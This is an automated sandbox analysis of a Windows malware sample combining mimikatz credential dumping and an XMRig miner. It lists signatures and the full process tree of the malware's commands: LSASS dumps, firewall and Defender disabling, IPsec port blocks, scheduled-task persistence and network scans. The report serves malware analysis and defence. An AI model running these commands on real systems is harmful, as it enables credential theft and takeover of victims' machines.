Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-09-2024 16:25

General

  • Target

    2024-09-21_711ce9ba544391e29bfa1afaa4b0a880_hacktools_icedid_mimikatz.exe

  • Size

    10.7MB

  • MD5

    711ce9ba544391e29bfa1afaa4b0a880

  • SHA1

    ebdfb95df286cf93d9d338fa623c3992b62c05c4

  • SHA256

    93b073df719282c06f91f280df9fa734667fd6c61bccbb669cecdf021c2150a3

  • SHA512

    e32b86c985bd1ff3c74632ee623a1936da74b17e92a3701cba208274b2c8ca6f30a195e60a05d103ac0e2f26eea2849f9a518654e19314c08eacc9c481fe38d7

  • SSDEEP

    98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (19159) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1680
      • C:\Windows\TEMP\kukrtgjtl\iggias.exe
        "C:\Windows\TEMP\kukrtgjtl\iggias.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2300
    • C:\Users\Admin\AppData\Local\Temp\2024-09-21_711ce9ba544391e29bfa1afaa4b0a880_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-09-21_711ce9ba544391e29bfa1afaa4b0a880_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3328
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\iyvumtbf\ceitlwt.exe
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1416
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4116
        • C:\Windows\iyvumtbf\ceitlwt.exe
          C:\Windows\iyvumtbf\ceitlwt.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2484
    • C:\Windows\iyvumtbf\ceitlwt.exe
      C:\Windows\iyvumtbf\ceitlwt.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1100
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4280
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1576
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:756
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2096
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
          3⤵
            PID:1804
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:3056
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4636
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:3940
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:4704
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:3068
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\bjvibcuuu\vrituptli\wpcap.exe /S
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3932
          • C:\Windows\bjvibcuuu\vrituptli\wpcap.exe
            C:\Windows\bjvibcuuu\vrituptli\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2924
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2736
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:4424
            • C:\Windows\SysWOW64\net.exe
              net stop "TrueSight Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2008
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "TrueSight Meter"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1384
            • C:\Windows\SysWOW64\net.exe
              net stop npf
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2316
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop npf
                5⤵
                • System Location Discovery: System Language Discovery
                PID:452
            • C:\Windows\SysWOW64\net.exe
              net start npf
              4⤵
              • System Location Discovery: System Language Discovery
              PID:4848
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 start npf
                5⤵
                  PID:3820
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net start npf
            2⤵
            • System Location Discovery: System Language Discovery
            PID:4436
            • C:\Windows\SysWOW64\net.exe
              net start npf
              3⤵
                PID:4700
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2684
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:4792
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2584
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 start npf
                  4⤵
                    PID:4292
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\bjvibcuuu\vrituptli\vgcgjtnzb.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bjvibcuuu\vrituptli\Scant.txt
                2⤵
                • System Location Discovery: System Language Discovery
                PID:4476
                • C:\Windows\bjvibcuuu\vrituptli\vgcgjtnzb.exe
                  C:\Windows\bjvibcuuu\vrituptli\vgcgjtnzb.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bjvibcuuu\vrituptli\Scant.txt
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:1428
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c C:\Windows\bjvibcuuu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bjvibcuuu\Corporate\log.txt
                2⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:2692
                • C:\Windows\bjvibcuuu\Corporate\vfshost.exe
                  C:\Windows\bjvibcuuu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4336
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "utvtlzbly" /ru system /tr "cmd /c C:\Windows\ime\ceitlwt.exe"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:100
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:3940
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "utvtlzbly" /ru system /tr "cmd /c C:\Windows\ime\ceitlwt.exe"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1148
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "etlbiltut" /ru system /tr "cmd /c echo Y|cacls C:\Windows\iyvumtbf\ceitlwt.exe /p everyone:F"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:4672
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1636
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /sc minute /mo 1 /tn "etlbiltut" /ru system /tr "cmd /c echo Y|cacls C:\Windows\iyvumtbf\ceitlwt.exe /p everyone:F"
                  3⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:3000
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "weumgilty" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\kukrtgjtl\iggias.exe /p everyone:F"
                2⤵
                  PID:1284
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                    3⤵
                      PID:4484
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "weumgilty" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\kukrtgjtl\iggias.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:3092
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1472
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:404
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:4112
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1788
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3956
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:1412
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3208
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4696
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:400
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3044
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:964
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static set policy name=Bastards assign=y
                    2⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    • System Location Discovery: System Language Discovery
                    PID:3328
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop SharedAccess
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1420
                    • C:\Windows\SysWOW64\net.exe
                      net stop SharedAccess
                      3⤵
                        PID:3844
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop SharedAccess
                          4⤵
                            PID:3536
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh firewall set opmode mode=disable
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2684
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh firewall set opmode mode=disable
                          3⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:4492
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh Advfirewall set allprofiles state off
                        2⤵
                          PID:2220
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh Advfirewall set allprofiles state off
                            3⤵
                            • Modifies Windows Firewall
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:4872
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop MpsSvc
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:3108
                          • C:\Windows\SysWOW64\net.exe
                            net stop MpsSvc
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1636
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop MpsSvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4080
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop WinDefend
                          2⤵
                            PID:3712
                            • C:\Windows\SysWOW64\net.exe
                              net stop WinDefend
                              3⤵
                                PID:224
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop WinDefend
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3092
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net stop wuauserv
                              2⤵
                                PID:844
                                • C:\Windows\SysWOW64\net.exe
                                  net stop wuauserv
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3000
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop wuauserv
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4072
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config MpsSvc start= disabled
                                2⤵
                                • System Location Discovery: System Language Discovery
                                PID:2888
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config MpsSvc start= disabled
                                  3⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:628
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c sc config SharedAccess start= disabled
                                2⤵
                                  PID:532
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config SharedAccess start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:3948
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config WinDefend start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3440
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config WinDefend start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    PID:1396
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config wuauserv start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4940
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config wuauserv start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    • System Location Discovery: System Language Discovery
                                    PID:960
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 800 C:\Windows\TEMP\bjvibcuuu\800.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1840
                                • C:\Windows\TEMP\xohudmc.exe
                                  C:\Windows\TEMP\xohudmc.exe
                                  2⤵
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of SetWindowsHookEx
                                  PID:1432
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 316 C:\Windows\TEMP\bjvibcuuu\316.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1324
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 1680 C:\Windows\TEMP\bjvibcuuu\1680.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1876
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 2556 C:\Windows\TEMP\bjvibcuuu\2556.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3084
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 2880 C:\Windows\TEMP\bjvibcuuu\2880.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5112
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 2968 C:\Windows\TEMP\bjvibcuuu\2968.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2752
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 3008 C:\Windows\TEMP\bjvibcuuu\3008.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2220
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 3744 C:\Windows\TEMP\bjvibcuuu\3744.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:960
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 3836 C:\Windows\TEMP\bjvibcuuu\3836.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3408
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 3900 C:\Windows\TEMP\bjvibcuuu\3900.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2536
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 3992 C:\Windows\TEMP\bjvibcuuu\3992.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2912
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 4460 C:\Windows\TEMP\bjvibcuuu\4460.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1840
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 4196 C:\Windows\TEMP\bjvibcuuu\4196.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1432
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 3544 C:\Windows\TEMP\bjvibcuuu\3544.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4324
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 3608 C:\Windows\TEMP\bjvibcuuu\3608.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4708
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 3636 C:\Windows\TEMP\bjvibcuuu\3636.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1412
                                • C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe
                                  C:\Windows\TEMP\bjvibcuuu\gyzjuuiut.exe -accepteula -mp 2816 C:\Windows\TEMP\bjvibcuuu\2816.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4696
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c C:\Windows\bjvibcuuu\vrituptli\scan.bat
                                  2⤵
                                    PID:3216
                                    • C:\Windows\bjvibcuuu\vrituptli\ujtcpitiu.exe
                                      ujtcpitiu.exe TCP 194.110.0.1 194.110.255.255 7001 512 /save
                                      3⤵
                                      • Executes dropped EXE
                                      • Drops file in Windows directory
                                      • System Location Discovery: System Language Discovery
                                      PID:976
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5704
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                        PID:5316
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                        3⤵
                                          PID:5668
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          3⤵
                                            PID:4136
                                          • C:\Windows\SysWOW64\cacls.exe
                                            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:3860
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                            3⤵
                                              PID:5520
                                            • C:\Windows\SysWOW64\cacls.exe
                                              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2684
                                        • C:\Windows\SysWOW64\bgzdci.exe
                                          C:\Windows\SysWOW64\bgzdci.exe
                                          1⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of SetWindowsHookEx
                                          PID:1328
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\kukrtgjtl\iggias.exe /p everyone:F
                                          1⤵
                                            PID:4440
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              2⤵
                                                PID:4328
                                              • C:\Windows\system32\cacls.exe
                                                cacls C:\Windows\TEMP\kukrtgjtl\iggias.exe /p everyone:F
                                                2⤵
                                                  PID:3552
                                              • C:\Windows\system32\cmd.EXE
                                                C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ceitlwt.exe
                                                1⤵
                                                  PID:3932
                                                  • C:\Windows\ime\ceitlwt.exe
                                                    C:\Windows\ime\ceitlwt.exe
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:1092
                                                • C:\Windows\system32\cmd.EXE
                                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\iyvumtbf\ceitlwt.exe /p everyone:F
                                                  1⤵
                                                    PID:964
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
